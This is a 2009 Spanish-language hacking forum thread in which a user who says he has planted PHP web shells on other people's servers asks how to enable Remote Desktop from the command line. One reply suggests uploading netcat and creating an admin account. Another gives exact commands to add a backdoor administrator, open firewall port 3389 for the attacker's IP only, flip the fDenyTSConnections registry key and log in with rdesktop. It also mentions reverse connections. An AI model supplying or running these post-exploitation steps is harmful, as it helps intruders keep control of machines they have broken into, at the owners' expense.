Acceso Remoto (habilitarlo por CMD)

Iniciado por ANTiSPY, 25 Noviembre 2009, 07:54 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

ANTiSPY

25 Noviembre 2009, 07:54 AM
Hola chicos, primeramente gracias por leer mi post ^^

segundo, les planteo mi caso

ando sacando php shells (las saco con exito)

siguiente, algunas son unix (perfecto) otras son windows, algunas d las windowss tienen la opcion de recibir axx remoto habilitado, asi que desde la php shell les tiro un comando "net user..." me creo el comando y ya tengo mi usuario en la maquina ;) (todo perfecto)

pero algunas de esas windows no tienen el axx para recibir conexiones remotas activadas.... mi pregunta es la siguiente

hay forma de, por algun comando en CMD, activar esa opcion en windows para habilitar las conexiones remotas a este ekipo, para poder loguearme?

(y de paso les dejo un bonus XD... ando buscando algun source o soft para las unix que me deje racearle, osea enviarle de otro ftp a las unix [via ftp] archivos, porque normalmente solo me deja enviarle por via ftp, archivos desde mi pc a ellas, no dejan pasarles archivo de ftp a ftp)

saludos!  :)

Pyr0s

#1
25 Noviembre 2009, 08:05 AM
Bueno espero que te sirva, podrias subirle el NC abrir el puerto que quieras y conectarte con Putty, una vez tengas la shell pones:

Net User Hacker Hacker

Le das permisos de Admin y con algun Software de conexion remota te conectas con su IP y tu User/Pass a su PC y como tienes nivel Admin podras hacer lo que quieras  :D

De todos modos te dejo un video que seguro quee sta mejor explicado, el video se trata de rootear una web pero creo que a ti te vale igual  ;)

http://milw0rm.com/video/watch.php?id=33

Mas o menos he seguido los pasos del video para explicartelo  ;D

Y en cuanto a tu segunda pregunta no te he entendido muy bien, de todos modos no se si se puede  :-\

Espero que te sirva el video.

Saludos!

kamsky

#2
25 Noviembre 2009, 13:03 PM
bueno, vas en el buen camino, vamos a suponer que has conseguido una shell con privilegios de admin, los pasos que más o menos debes seguir para conseguir acceso a escritorio remoto:

Primero , vamos a crearnos un usuario (ANTiSPY:ANTiSPY) y lo vamos a meter en el grupo "Administradores" y "Usuarios de escritorio remoto", para que podamos entrar por RDP y desde ahí tener todos los privilegios que podamos necesitar sobre la máquina

Código [Seleccionar]
>net user ANTiSPY ANTiSPY /add
Código [Seleccionar]
>net localgroup Administradores ANTiSPY /add
Código [Seleccionar]
>net localgroup "Usuarios de escritorio remoto" ANTiSPY /add


Ahora, es posible que tengamos filtrado el puerto de Terminal Server (3389/TCP), para comprobarlo bastará con un simple escaneo con NMap...
Si es así, vamos a tener que desactivar el firewall, o mejor aún, crear una excepción para nuestra IP de origen, así sólo nosotros tendremos acceso al Terminal Server y nadie más podrá aprovechar nuestro trabajo para entrar en la máquina:

Código [Seleccionar]
>netsh firewall add portopening protocol = TCP port = 3389 name = RDP mode = ENABLE scope = CUSTOM addresses = xx.xx.xx.xx


Si ahora hacemos un nuevo escaneo, veremos que...el puerto ha pasado de filtrado a cerrado, eso quiere decir que el firewall ha sido desactivado correctamente, aunque seguimos sin poder conectar porque no hay un servicio a la escucha. Esto es debido a que hay que modificar una clave de registro (en los Windows XP al menos, supongo que en los Server será parecido, pero no te lo aseguro) para poder activar la administración remota. Hagámoslo:

Código [Seleccionar]
>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


ya solo tenemos que acceder y probar la contraseña que hemos configurado a ver si todo el proceso anterior ha surtido efecto:

Código [Seleccionar]
# rdesktop xx.xx.xx.xx


Este proceso tiene algunas "pegas", la principal es que puede haber más firewalls en el sistema (firewalls en la red, no en el mismo sistema), la solución sería fácil, hacer una conexión inversa y que sea el Sistema el que se conecte con nosotros...
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Darioxhcx

#3
27 Noviembre 2009, 03:04 AM
Cita de: Enrrike87 en 27 Noviembre 2009, 02:58 AM
Cita de: ANTiSPY en 25 Noviembre 2009, 07:54 AM
Hola chicos, primeramente gracias por leer mi post ^^

segundo, les planteo mi caso

ando sacando php shells (las saco con exito) ....
De Verdad Soy Nuevo En Esto Pero Una Duda Como Se Saca El Php Shells Alguna Ayuda plz
que wtf ?


kamsky
sos groso... sabelo
:P

kamsky

#4
27 Noviembre 2009, 12:24 PM
groso?¿?¿eso es bueno o malo???   :laugh: :xD
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

ANTiSPY

#6
4 Diciembre 2009, 03:30 AM
epa =)

muxas gracias bro! :D


me parecio muy util tu info!

de verdad muxas gracias ;D

cualkier kosa... dejo un hilo, otro msg aki en el post XD

saludos.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario